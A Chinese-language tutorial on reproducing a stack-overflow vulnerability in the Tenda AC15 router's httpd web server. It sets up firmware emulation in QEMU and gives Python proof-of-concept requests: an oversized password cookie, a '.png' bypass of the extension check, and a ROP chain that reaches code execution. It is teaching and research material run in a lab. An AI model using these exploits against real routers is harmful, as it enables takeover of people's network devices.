Tenda AC15路由器固件栈溢出漏洞分析与利用教学文档<\/h1>

1. 环境准备<\/h2>

1.1 固件获取<\/h3>
路由器型号: Tenda AC15<\/li>
固件版本: 15.03.1.16_multi<\/li>
下载地址: https:\/\/drivers.softpedia.com\/dyn-postdownload.php\/d27e8410d32cd9de63a3506c47ded1bc\/61ff85c5\/75eb7\/4\/1<\/li> <\/ul>
1.2 工具安装<\/h3>
sudo apt install binwalk qemu-user-static libc6-arm* libc6-dev-arm* uml-utilities bridge-utils
<\/span><\/span><\/code><\/pre>2. 固件分析<\/h2>
2.1 固件解包<\/h3>
使用binwalk提取固件内容:<\/p>
binwalk -Me US.bin
<\/span><\/span><\/code><\/pre>2.2 文件架构分析<\/h3>
分析httpd可执行文件:<\/p>
readelf -h squashfs-root\/bin\/httpd
<\/span><\/span><\/code><\/pre>输出显示为32位ARM架构的ELF文件。<\/p>
3. 仿真环境搭建<\/h2>
3.1 QEMU配置<\/h3>
cp \/usr\/bin\/qemu-arm-static .
<\/span><\/span>sudo chroot .\/ .\/qemu-arm-static .\/bin\/httpd
<\/span><\/span><\/code><\/pre>3.2 补丁修改<\/h3>
使用IDA Pro打开httpd文件:<\/p>

搜索"WeLoveLinux"字符串<\/li>
找到死循环位置，将CMP R3,#0<\/code>修改为CMP R3,#1<\/code><\/li>
保存修改<\/li>
<\/ol>
3.3 网络配置<\/h3>
sudo brctl addbr br0
<\/span><\/span>sudo brctl addif br0 eth0
<\/span><\/span>sudo ifconfig br0 up
<\/span><\/span>sudo dhclient br0
<\/span><\/span>sudo tunctl -t br0 -u `<\/span>whoami`<\/span>
<\/span><\/span>sudo ifconfig br0 192.168.65.1\/24
<\/span><\/span><\/code><\/pre>4. 漏洞分析<\/h2>
4.1 漏洞位置<\/h3>
漏洞位于R7WebsSecurityHandler<\/code>函数中:<\/p>
if<\/span> (*<\/span>(_DWORD *<\/span>)(a1 +<\/span> 184<\/span>)) {
<\/span><\/span>    v40 =<\/span> strstr(*<\/span>(const<\/span> char<\/span> **<\/span>)(a1 +<\/span> 184<\/span>), "password="<\/span>);
<\/span><\/span>    if<\/span> (v40)
<\/span><\/span>        sscanf(v40, "%s"<\/span>, v33);
<\/span><\/span>    else<\/span>
<\/span><\/span>        sscanf<\/span>(*<\/span>(const<\/span> char<\/span> **<\/span>)(a1 +<\/span> 184<\/span>), "%s"<\/span>, v33);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>未对用户输入进行长度检查，导致栈溢出。<\/p>
4.2 访问路径限制<\/h3>
需要构造不在以下列表中的路径:<\/p>
\/<\/span>public\/<\/span>
<\/span><\/span>\/<\/span>lang\/<\/span>
<\/span><\/span>img\/<\/span>main-<\/span>logo.png
<\/span><\/span>reasy-<\/span>ui-<\/span>1.0.3<\/span>.js
<\/span><\/span>\/<\/span>favicon.ico
<\/span><\/span>\/<\/span>kns-<\/span>query
<\/span><\/span>\/<\/span>wdinfo.php
<\/span><\/span>\/<\/span>goform\/<\/span>telnet
<\/span><\/span>\/<\/span>goform\/<\/span>fast_setting
<\/span><\/span>\/<\/span>goform\/<\/span>ate
<\/span><\/span>\/<\/span>goform\/<\/span>InsertWhite
<\/span><\/span>\/<\/span>yun_safe.html
<\/span><\/span>\/<\/span>goform\/<\/span>getWanConnectStatus
<\/span><\/span>\/<\/span>goform\/<\/span>getProduct
<\/span><\/span>\/<\/span>goform\/<\/span>getRebootStatus
<\/span><\/span>\/<\/span>loginerr.html
<\/span><\/span><\/code><\/pre>5. 漏洞利用<\/h2>
5.1 调试设置<\/h3>
sudo chroot .\/ .\/qemu-arm-static -g 4444<\/span> .\/bin\/httpd
<\/span><\/span><\/code><\/pre>在另一个终端:<\/p>
gdb-multiarch .\/httpd
<\/span><\/span>target remote :4444
<\/span><\/span>b *0x002ED18  # 在漏洞函数结束处设置断点<\/span>
<\/span><\/span>continue<\/span>
<\/span><\/span><\/code><\/pre>5.2 初始PoC<\/h3>
import<\/span> requests
<\/span><\/span>URL =<\/span> "http:\/\/192.168.7.44:80\/goform\/blonet"<\/span>
<\/span><\/span>cookie =<\/span> {"Cookie"<\/span>: "password="<\/span> +<\/span> "a"<\/span> *<\/span> 0x400<\/span>}
<\/span><\/span>requests.<\/span>get(url=<\/span>URL, cookies=<\/span>cookie)
<\/span><\/span><\/code><\/pre>5.3 绕过检查<\/h3>
发现程序在0x0002c5cc处停止，需要绕过文件扩展名检查:<\/p>
import<\/span> requests
<\/span><\/span>URL =<\/span> "http:\/\/192.168.7.44:80\/goform\/blonet"<\/span>
<\/span><\/span>cookie =<\/span> {"Cookie"<\/span>: "password="<\/span> +<\/span> "a"<\/span> *<\/span> 0x400<\/span> +<\/span> ".pngAAA"<\/span>}
<\/span><\/span>requests.<\/span>get(url=<\/span>URL, cookies=<\/span>cookie)
<\/span><\/span><\/code><\/pre>5.4 ROP链构造<\/h3>
获取libc基地址后构造ROP链:<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>base =<\/span> 0xf65e5000<\/span>  # libc基地址<\/span>
<\/span><\/span>libc =<\/span> ELF('.\/lib\/libc.so.0'<\/span>)
<\/span><\/span>puts =<\/span> base +<\/span> libc.<\/span>sym['puts'<\/span>]
<\/span><\/span>_str =<\/span> "Hello <\/span>\x00<\/span>"<\/span>
<\/span><\/span>
<\/span><\/span>mov_r0 =<\/span> base +<\/span> 0x00040cb8<\/span>  # mov r0, sp; blx r3;<\/span>
<\/span><\/span>pop_r3 =<\/span> base +<\/span> 0x00018298<\/span>  # pop {r3, pc};<\/span>
<\/span><\/span>
<\/span><\/span>URL =<\/span> "http:\/\/192.168.7.44:80\/goform\/hello"<\/span>
<\/span><\/span>pl =<\/span> 'a'<\/span> *<\/span> 444<\/span> +<\/span> ".png"<\/span> +<\/span> p32(pop_r3) +<\/span> p32(puts) +<\/span> p32(mov_r0) +<\/span> _str
<\/span><\/span>cookie =<\/span> {"Cookie"<\/span>: "password="<\/span> +<\/span> pl}
<\/span><\/span>requests.<\/span>get(url=<\/span>URL, cookies=<\/span>cookie)
<\/span><\/span><\/code><\/pre>6. 关键点总结<\/h2>

固件分析<\/strong>: 使用binwalk提取固件，确认架构为ARM32<\/li>
环境搭建<\/strong>: 使用QEMU模拟ARM环境，配置网络桥接<\/li>
漏洞定位<\/strong>: 在httpd的R7WebsSecurityHandler函数中发现未检查长度的sscanf调用<\/li>
路径绕过<\/strong>: 构造不在黑名单中的路径(如\/goform\/blonet)<\/li>
检查绕过<\/strong>: 添加.png后缀绕过文件扩展名检查<\/li>
ROP利用<\/strong>: 利用已知gadget构造ROP链执行任意代码<\/li>
<\/ol>
7. 扩展知识<\/h2>

ARM架构调用约定<\/strong>: 前四个参数通过R0-R3传递，返回值通过R0返回<\/li>
栈布局<\/strong>: 需要精确计算偏移量覆盖返回地址<\/li>
内存保护<\/strong>: QEMU默认不开启ASLR，便于调试<\/li>
漏洞利用技巧<\/strong>: 使用字符串操作函数作为攻击向量时，注意空字节和特殊字符的处理<\/li>
<\/ol>
通过以上步骤，可以完整复现Tenda AC15路由器的栈溢出漏洞并实现利用。<\/p>